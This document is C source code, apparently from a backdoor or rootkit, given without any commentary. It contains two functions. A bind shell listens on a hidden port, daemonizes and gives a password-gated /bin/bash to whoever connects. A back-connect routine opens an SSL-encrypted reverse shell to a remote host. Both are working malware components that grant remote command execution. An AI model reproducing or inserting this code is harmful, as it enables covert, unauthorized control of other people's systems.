void bindshell() { struct sockaddr_in sockaddr,cliaddr; int sock,cli,clilen,pid,child; FILE *fd; sockaddr.sin_family = AF_INET; sockaddr.sin_port = htons(_HIDE_PORT_); sockaddr.sin_addr.s_addr = INADDR_ANY; sock=socket(AF_INET, SOCK_STREAM, 0); if(sock < 0) error_ret("socket"); if(bind(sock,(struct sockaddr *)&sockaddr,sizeof(sockaddr))<0) error_ret("bind"); if(listen(sock,MAXLISTEN)<0) error_ret("listen"); if((pid=fork())!=0){ printf("Daemon running with PID = %i\n",pid); exit(0); } setsid(); chdir(_H4X_PATH_); umask(0); close(0); signal(SIGCHLD, SIG_IGN); while(1){ clilen=sizeof(cliaddr); cli=accept(sock,(struct sockaddr *)&cliaddr,&clilen); if(cli<0) continue; if((child=fork())==0){ close(sock); dup2(cli,0); dup2(cli,1); dup2(cli,2); enterpass(cli); execve("/bin/bash", argv, envp); close(child); close(cli); } } return; }
/* * spawn a backconnect shell */ void backconnect(struct in_addr addr, u_short port) { int child; signal(SIGCHLD, SIG_IGN); if((child=fork())==0){ /*For magic stdin stdout sdterr*/ //printf("hello"); struct sockaddr_in sockaddr; int sock; //FILE *fd; //char *newline; //char buf[1028]; SSL_CTX *ctx; SSL *ssl; ctx = InitCTX(); sockaddr.sin_family = AF_INET; sockaddr.sin_addr = addr; sockaddr.sin_port = port; sock = socket(AF_INET, SOCK_STREAM, 0); if (connect(sock, (struct sockaddr*)&sockaddr, sizeof(sockaddr)) == 0) { ssl = SSL_new(ctx); SSL_set_fd(ssl,sock); sock = SSL_get_fd(ssl); if ( SSL_connect(ssl) == -1 ) ERR_print_errors_fp(stderr); else { enterpass(ssl); int writepipe[2] = {-1,-1}, /* parent -> child */ readpipe [2] = {-1,-1}; /* child -> parent */ pid_t childpid; /*------------------------------------------------------------------------ * CREATE THE PAIR OF PIPES * * Pipes have two ends but just one direction: to get a two-way * conversation you need two pipes. It's an error if we cannot make * them both, and we define these macros for easy reference. */ writepipe[0] = -1; if ( pipe(readpipe) < 0 || pipe(writepipe) < 0 ) { /* FATAL: cannot create pipe */ /* close readpipe[0] & [1] if necessary */ } #define PARENT_READ readpipe[0] #define CHILD_WRITE readpipe[1] #define CHILD_READ writepipe[0] #define PARENT_WRITE writepipe[1] signal(SIGCHLD, SIG_IGN); if ( (childpid = fork()) < 0) { /* FATAL: cannot fork child */ } else if ( childpid == 0 ) /* in the child */ { close(PARENT_WRITE); close(PARENT_READ); //dup2(CHILD_READ, 0); close(CHILD_READ); //dup2(CHILD_WRITE, 1); close(CHILD_WRITE); dup2(CHILD_WRITE,2);//for error remap_pipe_stdin_stdout(CHILD_READ,CHILD_WRITE); /* do child stuff */ //read_write(ssl,sock); execve("/bin/bash", argv, envp); //printf("bash close"); close(childpid); _exit(0); } else /* in the parent */ { close(CHILD_READ); close(CHILD_WRITE); //dup2(PARENT_READ, 0); //dup2(PARENT_WRITE, 1); remap_pipe_stdin_stdout(PARENT_READ,PARENT_WRITE); /* do parent stuff */ read_write(ssl,sock); //wait(); } close(sock); SSL_CTX_free(ctx); } } //return; close(child); _exit(0); }else if(child>0){ #ifdef DEBUG printf("---child PID:"); printf("%d",child); printf("\n"); #endif return; } return; }